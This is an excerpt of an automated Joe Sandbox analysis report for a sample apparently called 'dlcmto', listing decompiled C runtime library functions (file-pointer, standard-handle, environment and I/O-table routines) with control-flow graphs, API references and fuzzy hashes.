                                            • Part of subcall function 011986B8: WideCharToMultiByte.KERNEL32(?,00000000,01196BBD,00000000,00000001,01196CD1,0119AC31,?,01196BBD,?,00000000,?,0119B3ED,0000FDE9,00000000,?), ref: 0119875A
                                            • Part of subcall function 01197200: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0119BDD0,?,00000000,?,01198694,?,00000004,00000000,?,?,?,011934C6), ref: 01197232
                                          • _free.LIBCMT ref: 011987CD
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                          • String ID:
                                          • API String ID: 2560199156-0
                                          • Opcode ID: 1121b907f4addd3badaaba6cdede59f8cc116ce2ec37b46c58503fdbdc299591
                                          • Instruction ID: 003c789afeda21c40528182335719e94b3486ac58ae51fa6ff099408eb5660a6
                                          • Opcode Fuzzy Hash: 1121b907f4addd3badaaba6cdede59f8cc116ce2ec37b46c58503fdbdc299591
                                          • Instruction Fuzzy Hash: B50184A3A05A1A7B7F3D16BA1CC8C7F6D6DCDC79A43150128FA25D7240EB60CD1182B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119A1B4 Relevance: 4.5, APIs: 3, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 441 119a1b4-119a1cc call 1198b88 444 119a1df-119a1f5 SetFilePointerEx 441->444 445 119a1ce-119a1d3 call 1196e3f 441->445 446 119a1f7-119a204 GetLastError call 1196e65 444->446 447 119a206-119a210 444->447 450 119a1d9-119a1dd 445->450 446->450 447->450 451 119a212-119a227 447->451 453 119a22c-119a22f 450->453 451->453
                                          C-Code - Quality: 90%
                                          			E0119A1B4(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				intOrPtr _t28;
				signed int _t32;
				signed int _t33;
				signed int _t36;
				signed int _t39;

				_t36 = _a4;
				_push(_t32);
				_t15 = E01198B88(_t36);
				_t33 = _t32 | 0xffffffff;
				_t41 = _t15 - _t33;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = (_v12 & _v8) - _t33;
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							_t28 =  *((intOrPtr*)(0x11a9458 + (_t36 >> 6) * 4));
							_t11 = _t28 + _t39 + 0x28;
							 *_t11 =  *(_t28 + _t39 + 0x28) & 0x000000fd;
							__eflags =  *_t11;
						}
					} else {
						E01196E65(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E01196E3F(_t41))) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}













                                          0x0119a1bc
                                          0x0119a1bf
                                          0x0119a1c1
                                          0x0119a1c6
                                          0x0119a1ca
                                          0x0119a1cc
                                          0x0119a1df
                                          0x0119a1ed
                                          0x0119a1f3
                                          0x0119a1f5
                                          0x0119a20e
                                          0x0119a210
                                          0x00000000
                                          0x0119a212
                                          0x0119a212
                                          0x0119a21d
                                          0x0119a220
                                          0x0119a227
                                          0x0119a227
                                          0x0119a227
                                          0x0119a227
                                          0x0119a1f7
                                          0x0119a1fe
                                          0x00000000
                                          0x0119a203
                                          0x0119a1ce
                                          0x0119a1d3
                                          0x0119a1d9
                                          0x0119a1d9
                                          0x0119a1db
                                          0x0119a22f

                                          APIs
                                          • SetFilePointerEx.KERNELBASE(00000000,?,00000002,?,00000000,?,00000001,01196BBD,01196BBD,?,0119A0A3,?,?,00000002,00000000), ref: 0119A1ED
                                          • GetLastError.KERNEL32(?,0119A0A3,?,?,00000002,00000000,?,0119AB95,00000001,00000000,00000000,00000002,?,?,?,01196CD1), ref: 0119A1F7
                                          • __dosmaperr.LIBCMT ref: 0119A1FE
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID:
                                          • API String ID: 2336955059-0
                                          • Opcode ID: 7a91add4c3de4071f7c3606b783140a9ea9d1d064e1ed3c0ea17493f4f0bbf7e
                                          • Instruction ID: 3cb01f45a1ce5c2302741dc25989def059f0435769a472f235d171c0a1eaa8ef
                                          • Opcode Fuzzy Hash: 7a91add4c3de4071f7c3606b783140a9ea9d1d064e1ed3c0ea17493f4f0bbf7e
                                          • Instruction Fuzzy Hash: CB01FC72610129AFCF1D9FA9EC04C9E3F2ADF85234B250255F8319B190EB71DD4197A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01195B5B Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 455 1195b5b-1195b60 456 1195b62-1195b7a 455->456 457 1195b88-1195b91 456->457 458 1195b7c-1195b80 456->458 460 1195ba3 457->460 461 1195b93-1195b96 457->461 458->457 459 1195b82-1195b86 458->459 465 1195c01-1195c05 459->465 464 1195ba5-1195bb2 GetStdHandle 460->464 462 1195b98-1195b9d 461->462 463 1195b9f-1195ba1 461->463 462->464 463->464 466 1195bc1 464->466 467 1195bb4-1195bb6 464->467 465->456 468 1195c0b-1195c0e 465->468 470 1195bc3-1195bc5 466->470 467->466 469 1195bb8-1195bbf GetFileType 467->469 469->470 471 1195be3-1195bf5 470->471 472 1195bc7-1195bd0 470->472 471->465 475 1195bf7-1195bfa 471->475 473 1195bd8-1195bdb 472->473 474 1195bd2-1195bd6 472->474 473->465 476 1195bdd-1195be1 473->476 474->465 475->465 476->465
                                          C-Code - Quality: 84%
                                          			E01195B5B() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x11a9458 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x11a9690; // 0xf35bd0
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                          0x01195b60
                                          0x01195b62
                                          0x01195b66
                                          0x01195b6f
                                          0x01195b7a
                                          0x01195b8a
                                          0x01195b8e
                                          0x01195b91
                                          0x01195ba3
                                          0x01195b93
                                          0x01195b96
                                          0x01195b9f
                                          0x01195b98
                                          0x01195b9b
                                          0x01195b9b
                                          0x01195b96
                                          0x01195ba5
                                          0x01195bad
                                          0x01195bb2
                                          0x01195bc1
                                          0x01195bb8
                                          0x01195bb9
                                          0x01195bb9
                                          0x01195bc5
                                          0x01195be3
                                          0x01195be7
                                          0x01195bee
                                          0x01195bf5
                                          0x01195bf7
                                          0x01195bfa
                                          0x01195bfa
                                          0x01195bc7
                                          0x01195bc7
                                          0x01195bca
                                          0x01195bd0
                                          0x01195bdb
                                          0x01195bdd
                                          0x01195bdd
                                          0x01195bd2
                                          0x01195bd2
                                          0x01195bd2
                                          0x01195bd0
                                          0x01195b82
                                          0x01195b82
                                          0x01195b82
                                          0x01195c01
                                          0x01195c02
                                          0x01195c0e

                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,01195A4A,011A5E90,0000000C), ref: 01195BA7
                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,01195A4A,011A5E90,0000000C), ref: 01195BB9
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID:
                                          • API String ID: 3000768030-0
                                          • Opcode ID: 504d89f513f20d0959bd151f12b99a0f24bf5f1f3ffbd0192b10d81e2851d0d8
                                          • Instruction ID: d37e62cf641d4f6f7f20871373e70111ceedbe1098e101fed5edc8ddea566c56
                                          • Opcode Fuzzy Hash: 504d89f513f20d0959bd151f12b99a0f24bf5f1f3ffbd0192b10d81e2851d0d8
                                          • Instruction Fuzzy Hash: 2A11B4315047414BDFBE4E3E8C88522BE97A747234F29071BD6B7E65E1C730E485DA45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119374B Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 477 119374b-1193752 478 1193754-1193756 477->478 479 1193757-119375e call 1195c22 call 1198765 477->479 483 1193763-1193767 479->483 484 1193769-119376c 483->484 485 119376e-1193777 call 1193858 483->485 486 1193792-119379d call 11963fe 484->486 491 1193779-119377c 485->491 492 119377e-1193785 485->492 493 119378a-1193791 call 11963fe 491->493 492->493 493->486
                                          C-Code - Quality: 86%
                                          			E0119374B(void* __ecx) {
				void* __esi;
				intOrPtr* _t2;
				intOrPtr _t3;
				signed int _t12;
				signed int _t13;
				void* _t15;

				if( *0x11a9190 == 0) {
					_push(_t15);
					_push(_t12);
					E01195C22(_t15); // executed
					_t2 = E01198765(__ecx); // executed
					_t16 = _t2;
					if(_t2 != 0) {
						_t3 = E01193858(_t16);
						if(_t3 != 0) {
							 *0x11a919c = _t3;
							_t13 = 0;
							 *0x11a9190 = _t3;
						} else {
							_t13 = _t12 | 0xffffffff;
						}
						E011963FE(0);
					} else {
						_t13 = _t12 | 0xffffffff;
					}
					E011963FE(_t16);
					return _t13;
				} else {
					return 0;
				}
			}









                                          0x01193752
                                          0x01193757
                                          0x01193758
                                          0x01193759
                                          0x0119375e
                                          0x01193763
                                          0x01193767
                                          0x0119376f
                                          0x01193777
                                          0x0119377e
                                          0x01193783
                                          0x01193785
                                          0x01193779
                                          0x01193779
                                          0x01193779
                                          0x0119378c
                                          0x01193769
                                          0x01193769
                                          0x01193769
                                          0x01193793
                                          0x0119379d
                                          0x01193754
                                          0x01193756
                                          0x01193756

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5d6942da19541d917ea97662ea3565647bff3e4fc6366161625fe4ebdac950ea
                                          • Instruction ID: 6df7f4e6ac9cd0533f9c54bddacffc1b950d09ff2184ae2f7fd982aad8243bd5
                                          • Opcode Fuzzy Hash: 5d6942da19541d917ea97662ea3565647bff3e4fc6366161625fe4ebdac950ea
                                          • Instruction Fuzzy Hash: 25E09B62515D1665EF6E663E7C0976D1945FB9123DF41433ED53CC60C4DF70448286A3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011947AC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 496 11947ac-11947b8 497 11947ba-11947d0 call 1196e3f call 11964d1 496->497 498 11947d1-11947e6 call 11994ee 496->498 503 11947e8 498->503 504 11947eb-11947f1 call 119a072 498->504 503->504 508 11947f6-1194805 504->508 509 1194815-119481e 508->509 510 1194807 508->510 513 1194820-119482f 509->513 514 1194834-1194867 509->514 511 119480d-119480f 510->511 512 11948d7-11948dc 510->512 511->509 511->512 515 119492b-119492f 512->515 513->515 516 1194869-1194873 514->516 517 11948be-11948ca 514->517 520 1194875-1194881 516->520 521 1194897-11948a3 516->521 518 11948cc-11948d1 call 1196e3f 517->518 519 11948de 517->519 518->512 524 11948e1-11948eb 519->524 520->521 525 1194883-1194892 call 1194454 520->525 521->519 522 11948a5-11948bc call 11943d6 521->522 522->524 528 11948ed-11948ef 524->528 529 11948f1-11948f7 524->529 525->515 532 1194929 528->532 533 11948f9-1194908 call 11945ed 529->533 534 119490a-119490e 529->534 532->515 533->515 536 1194910-1194923 call 119a230 534->536 537 1194925-1194927 534->537 536->537 537->532
                                          C-Code - Quality: 93%
                                          			E011947AC(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				_t119 = _a4;
				if(_a4 != 0) {
					_t58 = E011994EE(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E0119A072(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0x11a9458 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								__eflags =  *(_a4 + 0xc) >> 0x00000002 & 0x00000001;
								if(__eflags != 0) {
									goto L18;
								} else {
									_t59 = E01196E3F(__eflags);
									 *_t59 = 0x16;
									goto L17;
								}
							} else {
								__eflags = _v8 - 1;
								_t96 = _v16;
								_t102 = _v20;
								if(_v8 != 1) {
									L13:
									_t76 =  *((intOrPtr*)(0x11a9458 + _t96 * 4));
									__eflags =  *((char*)(_t102 + _t76 + 0x28));
									if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
										L18:
										_t112 = _a4;
									} else {
										_t112 = _a4;
										_t77 = E011943D6( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
										_t116 = _t116 + 0xc;
										_t108 = _t108 + _t77;
										asm("adc ebx, edx");
									}
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E0119A230(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											goto L26;
										} else {
											_t74 = E011945ED(_a4, _t95, _t98, _t108, _t86);
										}
									} else {
										L26:
										_t74 = _t108;
									}
								} else {
									_t78 =  *((intOrPtr*)(0x11a9458 + _t96 * 4));
									__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
									if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
										goto L13;
									} else {
										_t74 = E01194454(_t108, _t111, _a4, _t111, _v12);
									}
								}
							}
						} else {
							asm("cdq");
							_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
							asm("sbb ecx, edx");
						}
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
						} else {
							__eflags = _t111;
							if(_t111 < 0) {
								goto L17;
							} else {
								goto L7;
							}
						}
					}
					return _t74;
				} else {
					 *((intOrPtr*)(E01196E3F(_t119))) = 0x16;
					return E011964D1() | 0xffffffff;
				}
			}




































                                          0x011947ac
                                          0x011947b4
                                          0x011947b8
                                          0x011947d6
                                          0x011947dc
                                          0x011947e1
                                          0x011947e3
                                          0x011947e6
                                          0x011947e8
                                          0x011947e8
                                          0x011947f1
                                          0x011947f6
                                          0x011947f8
                                          0x011947fb
                                          0x011947fe
                                          0x01194800
                                          0x01194803
                                          0x01194805
                                          0x01194815
                                          0x01194818
                                          0x0119481c
                                          0x0119481e
                                          0x01194839
                                          0x0119483c
                                          0x0119483f
                                          0x01194849
                                          0x01194850
                                          0x01194853
                                          0x0119485b
                                          0x0119485e
                                          0x0119485f
                                          0x01194861
                                          0x01194864
                                          0x01194867
                                          0x011948c8
                                          0x011948ca
                                          0x00000000
                                          0x011948cc
                                          0x011948cc
                                          0x011948d1
                                          0x00000000
                                          0x011948d1
                                          0x01194869
                                          0x01194869
                                          0x0119486d
                                          0x01194870
                                          0x01194873
                                          0x01194897
                                          0x01194897
                                          0x0119489e
                                          0x011948a3
                                          0x011948de
                                          0x011948de
                                          0x011948a5
                                          0x011948a5
                                          0x011948b0
                                          0x011948b5
                                          0x011948b8
                                          0x011948ba
                                          0x011948ba
                                          0x011948e1
                                          0x011948e6
                                          0x011948e9
                                          0x011948eb
                                          0x011948f1
                                          0x011948f5
                                          0x011948f7
                                          0x0119490a
                                          0x0119490e
                                          0x01194916
                                          0x0119491b
                                          0x01194923
                                          0x01194923
                                          0x01194925
                                          0x01194927
                                          0x00000000
                                          0x011948f9
                                          0x01194900
                                          0x01194905
                                          0x011948ed
                                          0x01194929
                                          0x01194929
                                          0x01194929
                                          0x01194875
                                          0x01194875
                                          0x0119487c
                                          0x01194881
                                          0x00000000
                                          0x01194883
                                          0x0119488a
                                          0x0119488f
                                          0x01194881
                                          0x01194873
                                          0x01194820
                                          0x01194826
                                          0x01194829
                                          0x0119482b
                                          0x0119482d
                                          0x01194807
                                          0x01194807
                                          0x011948d7
                                          0x011948d7
                                          0x0119480d
                                          0x0119480d
                                          0x0119480f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119480f
                                          0x01194807
                                          0x0119492f
                                          0x011947ba
                                          0x011947bf
                                          0x011947d0
                                          0x011947d0

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ae2bf8813c1a66d56a0430cd641f163bd2b7673d1656d14e5173a09c0963f7b
                                          • Instruction ID: 2494534d652998ca78a3a49d288a3c6bc611ff00c4fe31ac047a074a09d4e9c8
                                          • Opcode Fuzzy Hash: 1ae2bf8813c1a66d56a0430cd641f163bd2b7673d1656d14e5173a09c0963f7b
                                          • Instruction Fuzzy Hash: D3413834A00148AFDF1CDF9CCA80AA97FE2AF49368F198168E4699B751D7319D43C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01199122 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 542 1199122-1199267 call 11992c4 546 1199269-119927b call 119c382 542->546 547 11992c0-11992c3 542->547 549 1199280-1199285 546->549 549->547 550 1199287-11992bf 549->550
                                          C-Code - Quality: 67%
                                          			E01199122(void* __ecx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				char _v12;
				void* _v20;
				intOrPtr _v24;
				char _v32;
				void* _t26;

				_pop(_t47);
				E011992C4(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L4:
					return 0;
				} else {
					_t26 = E0119C382( &_v12, _v0, _v24, _a8, 0x180); // executed
					if(_t26 != 0) {
						goto L4;
					} else {
						 *0x11a9694 =  *0x11a9694 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a12 + 8)) = 0;
						 *((intOrPtr*)(_a12 + 0x1c)) = 0;
						 *((intOrPtr*)(_a12 + 4)) = 0;
						 *_a12 = 0;
						 *((intOrPtr*)(_a12 + 0x10)) = _v12;
						return _a12;
					}
				}
			}









                                          0x01199127
                                          0x01199252
                                          0x0119925e
                                          0x0119925f
                                          0x01199260
                                          0x01199267
                                          0x011992c0
                                          0x011992c3
                                          0x01199269
                                          0x0119927b
                                          0x01199285
                                          0x00000000
                                          0x01199287
                                          0x0119928a
                                          0x01199296
                                          0x0119929e
                                          0x011992a4
                                          0x011992aa
                                          0x011992b0
                                          0x011992b8
                                          0x011992bf
                                          0x011992bf
                                          0x01199285

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 760bed1ac9ec071b0a7114ea121576175431e122ac878b74493d64ce6965526b
                                          • Instruction ID: 1a887f90ededcdc1f373ce8666a7223aac9841ce6e1e599e19151abfde7895b9
                                          • Opcode Fuzzy Hash: 760bed1ac9ec071b0a7114ea121576175431e122ac878b74493d64ce6965526b
                                          • Instruction Fuzzy Hash: A9113D7190410EAFCF09DF98E94099B7BF4EF48318F054099F819AB241D731EA11CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01198E28 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 551 1198e28-1198e35 call 11971a3 553 1198e3a-1198e45 551->553 554 1198e4b-1198e53 553->554 555 1198e47-1198e49 553->555 556 1198e96-1198ea2 call 11963fe 554->556 557 1198e55-1198e59 554->557 555->556 558 1198e5b-1198e90 call 1195103 557->558 563 1198e92-1198e95 558->563 563->556
                                          C-Code - Quality: 95%
                                          			E01198E28(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E011971A3(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E01195103(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E011963FE(0);
				return _t35;
			}









                                          0x01198e2e
                                          0x01198e35
                                          0x01198e3a
                                          0x01198e3e
                                          0x01198e45
                                          0x01198e4b
                                          0x01198e4b
                                          0x01198e51
                                          0x01198e53
                                          0x01198e56
                                          0x01198e56
                                          0x01198e59
                                          0x01198e5b
                                          0x01198e61
                                          0x01198e65
                                          0x01198e6a
                                          0x01198e6e
                                          0x01198e70
                                          0x01198e73
                                          0x01198e79
                                          0x01198e80
                                          0x01198e84
                                          0x01198e88
                                          0x01198e8b
                                          0x01198e8e
                                          0x01198e8e
                                          0x01198e92
                                          0x01198e95
                                          0x01198e47
                                          0x01198e47
                                          0x01198e47
                                          0x01198e97
                                          0x01198ea2

                                          APIs
                                            • Part of subcall function 011971A3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01195671,00000001,00000364,00000007,000000FF,?,01198694,?,00000004,00000000,?,?), ref: 011971E4
                                          • _free.LIBCMT ref: 01198E97
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
